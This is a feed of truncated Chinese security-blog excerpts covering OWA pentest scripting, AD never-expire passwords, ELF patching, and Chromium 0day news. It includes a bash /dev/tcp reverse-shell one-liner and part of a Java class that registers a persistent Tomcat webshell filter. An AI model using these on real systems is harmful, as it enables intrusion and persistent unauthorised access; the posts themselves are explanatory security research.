CredSSP通常应用于远程桌面服务(Remote Desktop Protocol)和Windows远程管理(Windows Remote Management)(例如Powershell Remoting)

CredSSP提供了加密的传输层安全协议通道。协商协议使用Kerberos和NTLM

参考资料:

https://docs.microsoft.com/en-us/windows/win32/secauthn/credential-security-support-provider

2.通过组策略设置CredSSP的凭据分配

通过组策略可以指定使用CredSSP组件的应用程序是否发送默认凭据

组策略位置:Computer Configuration->Administrative Templates->System->Credentials Delegation

如下图



Allow delegating defau
2021-04-27 16:29:11三好学生
0x00 前言


Outlook Web Access的缩写是OWA,是Exchange用于Web方式收发邮件的界面,默认对所有邮箱用户开启。

通常,我们会使用浏览器访问OWA并读取邮件。但站在渗透测试的角度,我们需要通过命令行实现相同的功能。

目前我没有看到合适的开源代码和参考资料,于是打算基于自己的理解编写Python代码实现读取邮件和下载附件的功能。

0x01 简介


本文将要介绍以下内容:


  实现思路
  实现细节
  编写程序需要注意的问题
  开源代码
  使用流程


0x02 实现思路


我暂时没有找到介绍OWA协议格式的资料,所以只能通过抓包的方式实现

这里我使用Chrome浏览器自带的抓包工具,在Chrome界面按F12选择Network即可

0x03 实现细节


1.登录操作

访问的url为https://<domain>/owa/auth.owa

需要发送POST请求,数据格式:

destination=https://<domain>/owa&flags=4&forcedownlevel=0&username=<username>&password=<password>&passwordText=&isUtf8=1


登录成功后,Cookie包括X-OWA-CANARY,可以作为判断依据

实际登录过程一共发送了三个数据包,如下图



在程序实现上,使用Python的requests库不需要考虑这个细节

完整的实现代码已上传至github,地址如下:

https://github.com/3gstudent/Homework-of-Python/blob/master/checkOWA.py

代码实现了对口令的验证

这里需要注意OWA只能使用明文口令登录,无法使用hash

2.访问资源

通过抓包发现,基本上每个操作会按照以下格式实现:


  发送POST包
  Header中需要设置X-OWA-CANARY和Action
  X-OWA-CANARY可通过登录成功后返回的Cookie获得
  需要设置Cookie
  POST包的数据格式为JSON
  返回结果也是JSON格式


为了实现读取邮件内容和下载附件,我们需要通过程序实现以下操作:
2021-04-27 16:29:11三好学生
0x00 前言


在域环境中,域用户的凭据是十分重要的信息。为了增强安全性,域组策略会设置所有域用户口令的最长有效时间,到达过期时间后强制用户更改口令。

在实际环境中,有些域用户需要设置为密码永不过期,这可以通过添加密码永不过期属性来实现。

在域渗透中,我们需要枚举出具有密码永不过期属性的域用户,也需要能够将某个域用户设置为密码永不过期。

相对的站在防御角度,我们需要尽可能减少具有密码永不过期属性的域用户,也需要能够实时掌握这个域用户列表。

所以本文将会介绍不同条件下多种枚举、添加和删除密码永不过期属性的方法,分析原理,开源代码。

0x01 简介


本文将要介绍以下内容:


  实现原理
  枚举密码设置为永不过期的用户
  向指定用户添加密码永不过期属性的方法
  向指定用户删除密码永不过期属性的方法


0x02 实现原理


域用户的密码永不过期属性保存在域用户的userAccountControl属性中

userAccountControl属性使用数字表示,数值是多个具体属性数值的总和

每个具体属性对应一个不同的数值,具体的数值可参考:https://support.microsoft.com/en-us/help/305144/how-to-use-useraccountcontrol-to-manipulate-user-account-properties

下面举例进行说明:

用户test1的userAccountControl属性值为514,那么这个用户的具体属性如下:


  ACCOUNTDISABLE,2
  NORMAL_ACCOUNT,512


计算方法为2+512=514

添加密码永不过期属性的方法:

密码永不过期属性对应的值为65536(DONT_EXPIRE_PASSWORD),将userAccountControl属性值514再加上65536,设置为66048即可

注:

在程序设计上,为了可重复使用,采用的方法是同65536作按位或运算(运算符|)

按位或运算的运算规则:参加运算的两个数,按二进制位进行或运算,只要对应的二进位有一个为1时,结果位就为1,否则为0

删除密码永不过期属性的方法:

将userAccountControl属性值减去65536即可

注:

在程序设计上,为了可重复使用,采用的方法是同65536作按位异或运算(运算符
2021-04-25 13:47:41PansLabyrinth
那些年被误解的 reverse shell。
前言
昨天有个小伙伴在群里问在 macOS 下如何实现 bash 反弹 shell,因为 Mac 中没有 /dev/tcp 目录。借着这个问题,就来简单谈谈反弹 shell 的那些事。
从 bash 说起
可能大家都用过 bash 反弹 shell:
bash -i >& /dev/tcp/127.0.0.1/8080 0>&1
关于重定向部分很多文章有介绍了,但是 /dev 部分却鲜有提及。很多人以为 /dev/tcp/host/port 是 Linux 内核提供的一个 devfs (或者 udev),曾经我也是这么认为的,但实际上上面的命令在 macOS 甚至 Windows 也可以成功执行,显然这些系统中并不存在 /dev/tcp/ 之类的路径。
WHY?
原因很简单,因为这是 bash 本身提供的功能。其代码实现在 bash/redir.c 中:
/* A list of pattern/value pairs for filenames that the redirection
   code handles specially. */
static STRING_INT_ALIST _redir_special_filenames[] = {
#if !defined (HAVE_DEV_FD)
  { "/dev/fd/[0-9]*", RF_DEVFD },
#endif
#if !defined (HAVE_DEV_STDIN)
  { "/dev/stderr", RF_DEVSTDERR },
  { "/dev/stdin", RF_DEVSTDIN },
  { "/dev/stdout", RF_DEVSTDOUT },
#endif
#if defined (NETWORK_REDIRECTIONS)
  { "/dev/tcp/*/*", RF_DEVTCP },
  { "/dev/udp/*/*", RF_DEVUDP },
#endif
  { (char *)NULL, -1 }
};


static int
redir_special_open (spec, filename, flags, mode,
2021-04-24 22:08:36胡涂说
本文为周刊第九期,前期的周刊参见:周刊系列。

距离上一次周刊又过去五个月,这段时间虽然也有写点东西,但输出很少。写周刊的星期里输出的压力很大,而停写的日子里愧疚感又很强。唉,没有强大的毅力和内心,真不要立什么flag.

当迫于输出周刊的压力下,囫囵吞枣的阅读一些外文新闻,十篇之中可能最后只有一两篇能够入选周刊,而为了周刊的输出文字,得在一两周内阅读大量的文章。从好的方面说,大量的阅读是好事;但从不好的方面说,这些阅读都是蜻蜓点水,而且文章之间没有关联,无法沉淀成知识。套用《如何阅读一本书》的说法,这种阅读只是“检视阅读”,而要想把知识沉淀下来,还得“分析阅读”和“主题阅读”。

因此,我尝试用一种新的方式来写博客和周刊,这个方法即卡片盒笔记法。

卡片盒笔记法,英文是 Zettelkasten Method,Zettelkasten 来自于德文,Zettel 为卡片,Kasten 是盒子的意思。卡片盒笔记法也叫卢曼笔记法,以它的发明者尼克拉斯·卢曼(Niklas Luhemann)1命名。卢曼是一名德国社会学家,在上世纪六十年代,他毕业后从事公务员,工作之余,他开始研究哲学、组织管理学还有社会学。他将有价值的内容记录下来,开始时也按照内容分类用笔记本记录,但后来他发现这种方法不好,便发明了卡片盒笔记法。这套方法帮助他从事社会学研究,在30年的时间里,他出版了58本社会学专著,这还不包括其他大量的论文、译著。大学请他做教授,并叙述自己的简历,卢曼总结说:


  我的项目:社会科学;研究时间:30年;成本:0


卡片盒笔记法的具体做法是将笔记记录在一张卡片上,卡片分成三个部分,第一个部分是卡片的索引编号,每张卡片给唯一的编号;第二个部分是笔记的内容;第三个部分是引用其他卡片的编号,这张卡片内容如果跟其他卡片知识点相关,则在这个部分记录引用到其他卡片的编号。这样通过编号和索引引用则可以将卡片知识点关联起来。这些卡片都被保存在专门的盒子里。2




  卢曼的卡片盒


盒子和卡片是辅助工具,最重要的是卡片内容。卢曼卡片内容一般较短,并且一张卡片上只记录一个知识点;而且特别要注意的是,不是简单的复制信息,而是要用自己的话写。也就是说把自己的理解记录在卡片内容上。

有一个网站3专门来研究卡片盒笔记法,网站上也推荐了一些软件工具。软件工具可以非常方便的给卡片编索引并建立卡片之间的关联,这比卢曼维护着一大柜子的卡片
2021-04-23 18:35:50回忆飘如雪
0x01 背景在红队行动中,内存马虽然好用,但是它存在的最大的问题是重启之后就失效了。这时候留持久化后门就是一个刚需了。今天简单分享一个构造Tomcat中间件持久化后门的思路。0x02 原理相信通过@Filter/@Servlet标签来实现Tomcat后门的想法已经被用烂了,这里分享一个比较冷门的接口ServletContainerInitializer。它是Servlet 3.0新增的一个接口,主要用于在容器启动阶段通过编程风格注册web三大组件Filter, Servlet以及Listener,以取代通过web.xml配置注册,减少了对配置的依赖。我们可以用这样的机制来注册一个实现了webshell功能的组件,下面以注册Filter为例简单示范一下。0x03 实现首先我们编写一个class实现ServletContainerInitializer接口,其中onStartup方法会在Tomcat中间件重启加载当前webapp会优先执行这个方法。通过改方法,我们可以注册一个webshell的filter。12345678910111213141516171819package org.apache;import javax.servlet.*;import javax.servlet.annotation.HandlesTypes;import java.util.EnumSet;import java.util.Set;@HandlesTypes({MainFilter.class})public class MainFilterInitializer implements ServletContainerInitializer {    public void onStartup(Set<Class<?>> set, ServletContext servletContext) throws ServletException {        // 将webshell filter注册到上下文当中        FilterRegistration.Dynamic filter = servletContext.addFilter(MainFilter.class.getSimpleName(), MainFilter.class);      
2021-04-23 01:15:49小草窝博客
简介 DeimosC2 命令与控制(C2)工具,它利用多种通信方法来控制受到威胁的计算机。 DeimosC2服务器和代理可在Windows,Darwin和Linux上运行并经过测试。 ... 阅读全文>>
2021-04-22 17:34:59tyler_download的专栏
本节我们看看如何针对ELF可执行文件实现代码注入,这是一个简单的实例,但却可以有效的揭开冰山的一角。
我想很多人都用过破解软件,破解的一种机制就是通过修改程序的二进制代码,越过软件的授权认证机制,例如下面这个例子:
   auth = autoVerifyCode(code); //认证输入验证码是否正确
   if (auth == False) {
        exit(1); //验证错误直接退出
    }
    //下面代码是软件功能的正常运行

面对上面验证码的验证模式,一种破解办法就是将                    
                        作者:tyler_download 发表于 2021/04/22 17:25:19 原文链接 https://blog.csdn.net/tyler_download/article/details/116018688                    
                    
                        阅读:197
2021-04-21 20:55:54一个安全研究员
想写这篇文章好久了,重度拖延症患者就是拖拖拖…
然后本文主要是给大家介绍一下怎么实现一个IDEA静态代码检测插件,现在都在讲安全左移嘛,我觉得静态代码检测插件就是一个安全左移很好的落地,于是就想着学习一下
我自己在写这个插件的起步阶段其实遇到了很多问题,这些问题肯定也会是每一个想要写插件的人都会遇到的,所以,我就简单记录下我的开发过程供来者参考
开发环境搭建
首先得确保你的Plugin DevKit插件成功安装并启用了,一般情况下idea都自带了这个插件,你只需要手动启用一下就行,启用过后记得重启

然后创                    
                        作者:he_and 发表于 2021/04/21 16:58:07 原文链接 https://blog.csdn.net/he_and/article/details/115840080                    
                    
                        阅读:59
2021-04-21 17:14:46一个安全研究员
想写这篇文章好久了,重度拖延症患者就是拖拖拖…
然后本文主要是给大家介绍一下怎么实现一个IDEA静态代码检测插件,现在都在讲安全左移嘛,我觉得静态代码检测插件就是一个安全左移很好的落地,于是就想着学习一下
我自己在写这个插件的起步阶段其实遇到了很多问题,这些问题肯定也会是每一个想要写插件的人都会遇到的,所以,我就简单记录下我的开发过程供来者参考
开发环境搭建
首先得确保你的Plugin DevKit插件成功安装并启用了,一般情况下idea都自带了这个插件,你只需要手动启用一下就行,启用过后记得重启

然后创                    
                        作者:he_and 发表于 2021/04/21 16:58:07 原文链接 https://blog.csdn.net/he_and/article/details/115840080                    
                    
                        阅读:8
2021-04-19 20:53:40PHITHON BLOG
这是代码审计知识星球中Java安全漫谈的第十七篇文章。完整文章列表与相关代码请参考:https://github.com/phith0n/JavaThings

上一篇文章里,我们认识了java.util.PriorityQueue,它在Java中是一个优先队列,队列中每一个元素有自己的优先级。在反序列化这个对象时,为了保证队列顺序,会进行重排序的操作,而排序就涉及到大小比较,进而执行java.
2021-04-18 10:52:20小草窝博客
Django用的时间久了会觉得挺方便,定义好model,便有一套默认的后台系统给你提供一整套的增删改查服务,对于不想写后台的懒人来说非常方便,Hacking8的信息流就是用的默认Django后台。 但有时候我想在后台里加点自定义的东西,或是展示一些数据,或是增加一些自定义的按钮,就有点束手无策了。 这几天简单看了下django admin的代码,琢磨出了一些方案。。 简单的在template 阅读全文>>
2021-04-17 22:03:45面向信仰编程
2021-04-17 15:12:00小草窝博客
想给信息流( i.hacking 8.com )换一个翻译引擎,于是看到这个。 在线翻译的地址:https://fanyi.caiyunapp.com/#/ 它的翻译效果感觉挺不错的,所以就来分析一下怎么调用。 经过调试,它会发两个包,第一个包用于生成游客的jwt token 阅读全文>>
2021-04-17 09:51:23tyler_download的专栏
最近工作上需要使用java完成高并发的服务器后台设计,因此对此作了一些研究,于是想把研究的心得,总结,经验写出来与大家分享,顺便巩固自己的认知。java通常用来开发大型网站,特别是用来开发应对高并发的后台服务器,例如淘宝就是依赖java后台来满足每天面临的海量数据请求。
java在应对高并发上形成了一系列成熟的设计思想以及应用框架,掌握这些知识能大大扩宽一个技术人员的择业范围和技术实力,在未来十年内,在处理海量数据请求和高并发需求上,java的统治地位不会有太大的动摇。
本节我们先看java高并发设计所需的                    
                        作者:tyler_download 发表于 2021/04/17 09:40:18 原文链接 https://blog.csdn.net/tyler_download/article/details/115555319                    
                    
                        阅读:207
2021-04-16 01:11:01MSRC Blog
We’re excited to announce the top contributing researchers for the 2021 First Quarter (Q1)! Congratulations to all the researchers recognized in this quarter’s leaderboard and thank you to everyone who continues to help secure our customers and the ecosystem. The top three researchers of the 2021 Q1 Security Researcher Leaderboard are: Yuki Chen (4365 points), …  Congratulating Our Top MSRC 2021 Q1 Security Researchers! Read More »
2021-04-15 15:50:40360noah
0x01-概述2021年4月13日,安全研究人员Rajvardhan Agarwal在推特公布了本周第一个远程代码执行(RCE)的0Day漏洞,该漏洞可在当前版本(89.0.4389.114)的谷歌Chrome浏览器上成功触发。Agarwal公布的漏洞,是基于Chromium内核的浏览器中V8 JavaScript引擎的远程代码执行漏洞,同时还发布了该漏洞的PoC。2021年4月14日,360高级攻防实验室安全研究员frust公布了本周第二个Chromium 0day(Issue 1195777)以及Chrome 89.0.4389.114的poc视频验证。该漏洞会影响当前最新版本的Google Chrome 90.0.4430.72,以及Microsoft Edge和其他可能基于Chromium的浏览器。Chrome浏览器沙盒可以拦截该漏洞。但如果该漏洞与其他漏洞进行组合,就有可能绕过Chrome沙盒。0x02-漏洞PoC目前四个漏洞issue 1126249、issue 1150649、issue